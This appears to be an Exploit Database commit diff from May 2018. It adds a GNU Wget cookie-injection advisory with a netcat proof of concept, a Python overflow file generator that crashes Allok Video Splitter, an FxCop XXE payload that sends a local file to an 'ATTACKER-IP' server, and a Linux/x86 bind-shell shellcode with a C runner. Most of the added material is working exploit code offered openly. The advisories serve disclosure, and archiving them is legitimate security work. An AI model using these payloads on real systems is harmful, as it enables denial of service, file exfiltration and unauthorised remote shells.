DB: 2018-05-10

4 changes to exploits/shellcodes

Allok Video Splitter 3.1.12.17 - Denial of Service
GNU wget - Cookie Injection
FxCop 10/12 - XML External Entity Injection
Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)
PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)
PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)
Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)
PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)

Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)

exploits/linux/local/44601.txt

@@ -0,0 +1,125 @@
+GNU Wget Cookie Injection [CVE-2018-0494]
+=========================================
+The latest version of this advisory is available at:
+https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt
+
+
+Overview
+--------
+
+GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
+the cookie jar file.
+
+
+Description
+-----------
+
+Normally a website should not be able to set cookies for other domains. Due to
+insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
+values to the cookie jar file, bypassing this security restriction.
+
+
+Impact
+------
+
+An external attacker is able to inject arbitrary cookie values cookie jar file,
+adding new or replacing existing cookie values.
+
+
+Details
+-------
+
+The discovered vulnerability, described in more detail below, enables the attack
+described here in brief.
+
+1. The attacker controlled web site sends a specially crafted Set-Cookie -header
+   to inject a new authentication cookie for example.com, replacing the existing
+   one. In order to be successful the victim must perform a wget operation on the
+   attacker controller site, for example:
+   wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
+2. Victim uses wget to post some secret the the api.example.com:
+   wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload
+
+Since the attacker was able to replace the authentication cookie for example.com,
+the secret.txt data will be posted to attacker's account instead to that of the
+victim.
+
+
+Vulnerabilities
+---------------
+
+1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]
+
+The cookie parsing implementation does too lax input validation when parsing the
+Set-Cookie response from the server. Consider the following malicious response:
+
+HTTP/1.1 200 OK
+Content-Length: 0
+Set-Cookie: foo="bar
+ .google.com    TRUE    /       FALSE   1900000000      injected        cookie
+        ";expires=Thursday, 01-Jan-2032 08:00:00 GMT
+
+
+When parsed by Wget and stored to a cookie jar file it will appear as:
+
+# HTTP cookie file.
+# Generated by Wget on 2018-04-27 23:28:21.
+# Edit at your own risk.
+
+127.0.0.1:7777  FALSE   /       FALSE   1956556800      foo     "bar
+ .google.com    TRUE    /       FALSE   1900000000      injected        cookie
+        "
+
+Since the Wget cookie jar parser skips any leading spaces, the .google.com line
+will be picked up.
+
+Note: The order in which the hosts/domains are stored in the cookie jar is derived
+from the hashing function used to speed up the lookups. If an existing cookie is
+to be replaced the server hostname used to serve the Set-Cookie will need to be
+carefully chosen to result in hash entry below the targeted domain. If not done,
+the original cookie will be used instead of the injected one.
+
+
+Proof of Concept
+----------------
+
+1. Set up a minimal web server, good for 1 request:
+ $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie: 
+foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00 
+GMT\r\n\r\n' | nc -v -l 7777
+
+2. Fetch the evil url:
+ $ wget --save-cookies jar.txt http://127.0.0.1:7777/plop
+
+3. Examine the resulting cookie jar file:
+ $ cat jar.txt
+
+
+Vulnerable versions
+-------------------
+
+The following GNU Wget versions are confirmed vulnerable:
+
+- 1.7 thru 1.19.4
+
+
+Mitigation
+----------
+
+1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package
+   in your distribution
+
+
+Credits
+-------
+
+The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.
+
+
+Timeline
+--------
+
+2018.04.26  discovered & reported the vulnerability
+2018.04.27  CVE-2018-0494 assigned
+2018.05.06  GNU Wget 1.19.5 released with the fix
+2018.05.06  public disclosure of the advisory

exploits/windows/dos/44605.py

@@ -0,0 +1,23 @@
+###########################################################################################
+# Exploit Title: Allok Video Splitter 3.1.1217
+# Date: 2018-05-09
+# Exploit Author: Achilles
+# Vendor Homepage: http://www.alloksoft.com/
+# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
+# Tested on OS: Windows 7 64-bit DE
+# Steps to reproduce: Copy the contents of the file (Evil.txt)
+# and paste in the License Name field click Register and BOOM
+###########################################################################################
+
+#!/usr/bin/python
+  
+buffer = "A" * 780
+  
+try:
+    f=open("Evil.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/44603.txt

@@ -0,0 +1,103 @@
+[+] Credits: hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: Apparition Security          
+
+ 
+***Greetz: indoushka|Eduardo|Dirty0tis***
+
+
+Vendor:
+========
+www.microsoft.com
+
+
+Product:
+===========
+Microsoft Windows "FxCop" v10-12  
+
+
+
+Vulnerability Type:
+===================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+Security Issue:
+================
+FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. 
+If you have the the particular SDK in question it is probably there but needs to be installed as it was for me.
+
+
+MSRC Response:
+=============
+"Weíve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0  as far as SDKs are concerned, with version 13.0 skipped).
+We have confirmation that the SDKs for Win8+ donít ship FxCop
+We are going to pull Win7 SDKs containing v10-v12 of FxCop.  Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run
+after an SDKís install (if even feasible) would just draw attention to the problem.
+Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected.
+
+In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability."
+
+
+Exploit/POC:
+=============
+1) python -m SimpleHTTPServer
+
+2) "POC.FxCop" 
+
+<?xml version="1.0"?>
+<!DOCTYPE roottag [ 
+<!ENTITY % file SYSTEM "c:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8000/payload.dtd">
+%dtd;]>
+<FxCopProject Version="1.36" Name="My FxCop Project">&send;</FxCopProject>
+
+
+3) "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8000?%file;'>">
+%all;
+
+4) Import or Open "POC.FxCop" file in FxCop
+
+
+Files get exfiltrated to attacker server.
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: March 15, 2018
+Vendor opens MSRC Case 44322?: March 16, 2018
+Vendor reproduces issue : April 6, 2018
+Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
+May 9, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).

files_exploits.csv

@@ -5967,6 +5967,7 @@ id,file,description,date,author,type,platform,port
 44579,exploits/linux/dos/44579.c,"Linux Kernel  < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
+44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9704,6 +9705,8 @@ id,file,description,date,author,type,platform,port
 44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
 44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
+44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
+44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16474,9 +16477,9 @@ id,file,description,date,author,type,platform,port
 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
 44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
 44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows,
-44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
-44598,exploits/php/remote/44598.rb,"PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
-44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
+44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

files_shellcodes.csv

@@ -881,3 +881,4 @@ id,file,description,date,author,type,platform
 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
+44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86

shellcodes/linux_x86/44602.c

@@ -0,0 +1,88 @@
+/*
+Title:      Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
+Author:     Amine Kanane <aminekanane_93@hotmail.com>
+Student-ID: SLAE - 1203
+Desc:       Listen for a connection on Local Port 9443 and spawn a command shell
+            This version support multiple simultaneous connections using fork().
+	    Also this shellcode does not use the classic socketcall() syscall.
+Tested on:  Linux/x86 - SMP Debian 4.9.30-1kali1
+Date:       7 May 2018
+Disassembly of section .text:
+08048060 <_start>:
+ 8048060:	31 c0                	xor    eax,eax
+ 8048062:	31 db                	xor    ebx,ebx
+ 8048064:	31 c9                	xor    ecx,ecx
+ 8048066:	31 d2                	xor    edx,edx
+ 8048068:	66 b8 67 01          	mov    ax,0x167
+ 804806c:	b3 02                	mov    bl,0x2
+ 804806e:	b1 01                	mov    cl,0x1
+ 8048070:	cd 80                	int    0x80
+ 8048072:	89 c3                	mov    ebx,eax
+ 8048074:	66 b8 69 01          	mov    ax,0x169
+ 8048078:	52                   	push   edx
+ 8048079:	66 68 24 e3          	pushw  0xe324 ; <== This is where we set the port number, please note that you need to adapt the number using htons() before :)
+ 804807d:	66 6a 02             	pushw  0x2
+ 8048080:	89 e1                	mov    ecx,esp
+ 8048082:	b2 10                	mov    dl,0x10
+ 8048084:	cd 80                	int    0x80
+ 8048086:	66 b8 6b 01          	mov    ax,0x16b
+ 804808a:	31 c9                	xor    ecx,ecx
+ 804808c:	cd 80                	int    0x80
+0804808e <infinite>:
+ 804808e:	31 d2                	xor    edx,edx
+ 8048090:	31 f6                	xor    esi,esi
+ 8048092:	66 b8 6c 01          	mov    ax,0x16c
+ 8048096:	cd 80                	int    0x80
+ 8048098:	89 c6                	mov    esi,eax
+ 804809a:	31 c0                	xor    eax,eax
+ 804809c:	b0 02                	mov    al,0x2
+ 804809e:	cd 80                	int    0x80
+ 80480a0:	31 ff                	xor    edi,edi
+ 80480a2:	39 f8                	cmp    eax,edi
+ 80480a4:	75 e8                	jne    804808e <infinite>
+ 80480a6:	31 c0                	xor    eax,eax
+ 80480a8:	b0 06                	mov    al,0x6
+ 80480aa:	cd 80                	int    0x80
+ 80480ac:	89 f3                	mov    ebx,esi
+ 80480ae:	b1 02                	mov    cl,0x2
+080480b0 <loop_dup>:
+ 80480b0:	b0 3f                	mov    al,0x3f
+ 80480b2:	cd 80                	int    0x80
+ 80480b4:	fe c9                	dec    cl
+ 80480b6:	79 f8                	jns    80480b0 <loop_dup>
+ 80480b8:	31 c0                	xor    eax,eax
+ 80480ba:	50                   	push   eax
+ 80480bb:	89 e2                	mov    edx,esp
+ 80480bd:	68 2f 2f 73 68       	push   0x68732f2f
+ 80480c2:	68 2f 62 69 6e       	push   0x6e69622f
+ 80480c7:	89 e3                	mov    ebx,esp
+ 80480c9:	50                   	push   eax
+ 80480ca:	53                   	push   ebx
+ 80480cb:	89 e1                	mov    ecx,esp
+ 80480cd:	b0 0b                	mov    al,0xb
+ 80480cf:	cd 80                	int    0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
+                       "\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
+                       "\x66\xb8\x69\x01\x52\x66\x68"
+                       "\x24\xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
+                       "\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
+                       "\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
+                       "\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
+                       "\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
+                       "\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
+                       "\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
+                       "\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
+                       "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
+                       "\xb0\x0b\xcd\x80";
+main()
+{
+	printf("Shellcode Length: %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+	ret();
+}